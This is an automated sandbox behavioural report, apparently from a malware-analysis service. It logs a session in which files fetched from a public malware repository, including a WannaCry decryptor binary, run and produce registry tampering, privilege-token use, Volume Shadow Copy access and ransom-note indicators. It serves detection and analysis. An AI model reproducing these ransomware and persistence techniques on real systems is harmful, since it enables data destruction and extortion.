Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Extension Compatibility\{2318C2B1-4965-11D4-9B18-009027A5CD4F}\FWLink = "{=Tr‚ÛDß2+Œ,9Ž\x15~ÙZ7ùpŒÊ±«¯ù\u0081"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\UnattendBackup\ActiveSetup\UserAgent	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\W2kVersion = "²ÁZ\x119\vÄ\x12¨ÍyœÜ\a\"¶\x02^¦Ù f4\x17#6Ð¿"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\SECURE\RegPoliciesPath = "O,Ð\u00ad½¨+ª72cMÿZ¿Õ;õî„\x17ÔŠÒs¿¢N"	cmd.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "Æùh\u00a0[dƒ=5Ü·ÚJ\x16Ù\x06¦\x16XzÐŒ\x1fX1Óè:"	cmd.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	OpenWith.exe

NTFS ADS 6 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 856032.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 951443.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 371500.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 489388.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 663173.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 204317.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 4 IoCs

ransomware

pid	Process
5324	Notepad.exe
2564	Notepad.exe
6564	Notepad.exe
6648	Notepad.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1440	vlc.exe
2268	vlc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4348	msedge.exe
4348	msedge.exe
3968	msedge.exe
3968	msedge.exe
3428	identity_helper.exe
3428	identity_helper.exe
5312	msedge.exe
5312	msedge.exe
5872	chrome.exe
5872	chrome.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
5676	msedge.exe
1380	msedge.exe
1380	msedge.exe
5140	RKill_V2.9.1.064.exe
5140	RKill_V2.9.1.064.exe
5140	RKill_V2.9.1.064.exe
5140	RKill_V2.9.1.064.exe
6416	msedge.exe
6416	msedge.exe
5708	RKill_V2.9.1.064.exe
5708	RKill_V2.9.1.064.exe
5708	RKill_V2.9.1.064.exe
5708	RKill_V2.9.1.064.exe
2940	msedge.exe
2940	msedge.exe
5092	msedge.exe
5092	msedge.exe
920	RKill_V2.9.1.064.exe
920	RKill_V2.9.1.064.exe
920	RKill_V2.9.1.064.exe
920	RKill_V2.9.1.064.exe
4764	msedge.exe
4764	msedge.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe
3676	VeryFun.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

pid	Process
1440	vlc.exe
2268	vlc.exe
3712	cmd.exe
6784	cmd.exe
6176	cmd.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeShutdownPrivilege	5872	chrome.exe
Token: SeCreatePagefilePrivilege	5872	chrome.exe
Token: SeDebugPrivilege	2632	taskkill.exe
Token: SeDebugPrivilege	6160	RKill_V2.9.1.0.exe
Token: SeDebugPrivilege	5140	RKill_V2.9.1.064.exe
Token: SeDebugPrivilege	3040	RKill_V2.9.1.0.exe
Token: SeDebugPrivilege	5708	RKill_V2.9.1.064.exe
Token: SeDebugPrivilege	5156	taskkill.exe
Token: SeDebugPrivilege	4276	taskkill.exe
Token: SeDebugPrivilege	4732	taskkill.exe
Token: SeDebugPrivilege	100	taskkill.exe
Token: SeIncreaseQuotaPrivilege	7072	WMIC.exe
Token: SeSecurityPrivilege	7072	WMIC.exe
Token: SeTakeOwnershipPrivilege	7072	WMIC.exe
Token: SeLoadDriverPrivilege	7072	WMIC.exe
Token: SeSystemProfilePrivilege	7072	WMIC.exe
Token: SeSystemtimePrivilege	7072	WMIC.exe
Token: SeProfSingleProcessPrivilege	7072	WMIC.exe
Token: SeIncBasePriorityPrivilege	7072	WMIC.exe
Token: SeCreatePagefilePrivilege	7072	WMIC.exe
Token: SeBackupPrivilege	7072	WMIC.exe
Token: SeRestorePrivilege	7072	WMIC.exe
Token: SeShutdownPrivilege	7072	WMIC.exe
Token: SeDebugPrivilege	7072	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7072	WMIC.exe
Token: SeRemoteShutdownPrivilege	7072	WMIC.exe
Token: SeUndockPrivilege	7072	WMIC.exe
Token: SeManageVolumePrivilege	7072	WMIC.exe
Token: 33	7072	WMIC.exe
Token: 34	7072	WMIC.exe
Token: 35	7072	WMIC.exe
Token: 36	7072	WMIC.exe
Token: SeIncreaseQuotaPrivilege	7072	WMIC.exe
Token: SeSecurityPrivilege	7072	WMIC.exe
Token: SeTakeOwnershipPrivilege	7072	WMIC.exe
Token: SeLoadDriverPrivilege	7072	WMIC.exe
Token: SeSystemProfilePrivilege	7072	WMIC.exe
Token: SeSystemtimePrivilege	7072	WMIC.exe
Token: SeProfSingleProcessPrivilege	7072	WMIC.exe
Token: SeIncBasePriorityPrivilege	7072	WMIC.exe
Token: SeCreatePagefilePrivilege	7072	WMIC.exe
Token: SeBackupPrivilege	7072	WMIC.exe
Token: SeRestorePrivilege	7072	WMIC.exe
Token: SeShutdownPrivilege	7072	WMIC.exe
Token: SeDebugPrivilege	7072	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7072	WMIC.exe
Token: SeRemoteShutdownPrivilege	7072	WMIC.exe
Token: SeUndockPrivilege	7072	WMIC.exe
Token: SeManageVolumePrivilege	7072	WMIC.exe
Token: 33	7072	WMIC.exe
Token: 34	7072	WMIC.exe
Token: 35	7072	WMIC.exe
Token: 36	7072	WMIC.exe
Token: SeBackupPrivilege	4268	vssvc.exe
Token: SeRestorePrivilege	4268	vssvc.exe
Token: SeAuditPrivilege	4268	vssvc.exe
Token: SeDebugPrivilege	4056	RKill_V2.9.1.0.exe
Token: SeDebugPrivilege	920	RKill_V2.9.1.064.exe
Token: SeDebugPrivilege	3676	VeryFun.exe
Token: 33	5688	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	5688	AUDIODG.EXE
Token: SeDebugPrivilege	6600	RKill_V2.9.1.0.exe
Token: SeDebugPrivilege	6704	RKill_V2.9.1.064.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
3968	msedge.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
5872	chrome.exe
2452	Free YouTube Downloader.exe
1440	vlc.exe
1440	vlc.exe
1440	vlc.exe
2268	vlc.exe
2268	vlc.exe
6596	cmd.exe
6596	cmd.exe
6596	cmd.exe
6596	cmd.exe
6596	cmd.exe
6596	cmd.exe
6596	cmd.exe
6596	cmd.exe

Suspicious use of SetWindowsHookEx 22 IoCs

pid	Process
6160	RKill_V2.9.1.0.exe
5140	RKill_V2.9.1.064.exe
5720	FreeYoutubeDownloader.exe
3040	RKill_V2.9.1.0.exe
5708	RKill_V2.9.1.064.exe
2884	!WannaDecryptor!.exe
2884	!WannaDecryptor!.exe
5640	!WannaDecryptor!.exe
5640	!WannaDecryptor!.exe
7048	!WannaDecryptor!.exe
7048	!WannaDecryptor!.exe
4360	!WannaDecryptor!.exe
4360	!WannaDecryptor!.exe
5280	OpenWith.exe
1440	vlc.exe
2268	vlc.exe
3676	VeryFun.exe
6972	cmd.exe
6596	cmd.exe
3712	cmd.exe
6784	cmd.exe
6176	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3968 wrote to memory of 1236	3968	msedge.exe	85
PID 3968 wrote to memory of 1236	3968	msedge.exe	85
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 3536	3968	msedge.exe	86
PID 3968 wrote to memory of 4348	3968	msedge.exe	87
PID 3968 wrote to memory of 4348	3968	msedge.exe	87
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88
PID 3968 wrote to memory of 2372	3968	msedge.exe	88

System policy modification 1 TTPs 11 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "‚o‚áI²lÓ\x12¬\x131\x1b\x0eÞ`=å&#\r\r\x01–\n«ŒA"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\UIPI	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\UIPI\ = "É?\x1a\u00a0ÜJŒyŒ‡5Ý\u00a0q×â\x10‚¼}ž¡‘è\|–\x19€"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Servicing\CountryCode = "výÑ\u008f/\x04ÔfÖ?\x1d_û}\u009d\u0081CJÜo\x192¹6[…\u00adæ"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "FWOV‰¯ž\x16à:X\u00a0\x11Rž\n\fù‹+«¹\x1c$Q\u009dœ."	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SettingsPageVisibility = "¢\x1c$ÄÙ¸ìÖ@˜ùÛ‡¡#"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} = " \x01\"?S‹½ã\x19\"Ï%¡K[¼®oS\x1dÇH&ìñÒ{_"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Servicing	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
  2⤵
  - Enumerates system info in registry
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaf21a46f8,0x7ffaf21a4708,0x7ffaf21a4718
    3⤵
    PID:1236
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
    3⤵
    PID:3536
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4348
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2624 /prefetch:8
    3⤵
    PID:2372
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
    3⤵
    PID:4232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
    3⤵
    PID:3776
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
    3⤵
    PID:4120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
    3⤵
    PID:592
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
    3⤵
    PID:816
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3376 /prefetch:8
    3⤵
    PID:3560
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3376 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3428
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
    3⤵
    PID:5192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
    3⤵
    PID:5396
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
    3⤵
    PID:5684
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
    3⤵
    PID:5836
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
    3⤵
    PID:5844
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
    3⤵
    PID:6000
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
    3⤵
    PID:6008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
    3⤵
    PID:5184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
    3⤵
    PID:4112
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5972 /prefetch:8
    3⤵
    PID:5604
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,7736973369104573931,6155855265894306144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
